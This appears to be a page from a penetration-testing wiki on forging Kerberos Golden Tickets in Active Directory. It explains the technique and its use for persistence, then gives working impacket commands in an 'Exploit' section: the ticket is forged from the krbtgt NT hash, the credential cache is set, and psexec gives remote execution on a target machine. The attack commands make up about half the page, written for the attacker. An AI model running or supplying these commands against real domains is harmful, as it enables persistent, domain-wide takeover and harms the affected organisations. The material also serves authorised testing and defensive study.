search

Golden Tickets

A Golden Ticket is a Ticket Granting Ticket (TGT) for the krbtgt domain account, the service account for the Key Distribution Center. This special TGT can be used to obtain a Service Ticket for any service on the network.

The password (more commonly NTLM hash) for the krbtgt account is required to obtain the TGT/Golden Ticket. This is often obtained through a DCSync attack once you get domain administrator privileges or similar.

circle-info

The Golden Ticket can be a means of persistence on the network since, by default, the password for the krbtgt account does not change.

hashtag
Exploit

LogoGitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHubchevron-right
Linux (Attacker)
## Create a Golden Ticket Using the NT Hash of the krbtgt Account
ticketer.py -nthash [krbtgt nt hash] -domain-sid [domain sid] -domain [domain] krbtgt

## Set Obtained .ccache to Kerberos Credential Cache
export KRB5CCNAME=[path to .ccache]

## Use Your Exec Tool of Choice to Access Your Specific Service
psexec.py [domain]/krbtgt@[computer] -k -no-pass
PreviousSilver TicketsNextKerberos Delegation

Last updated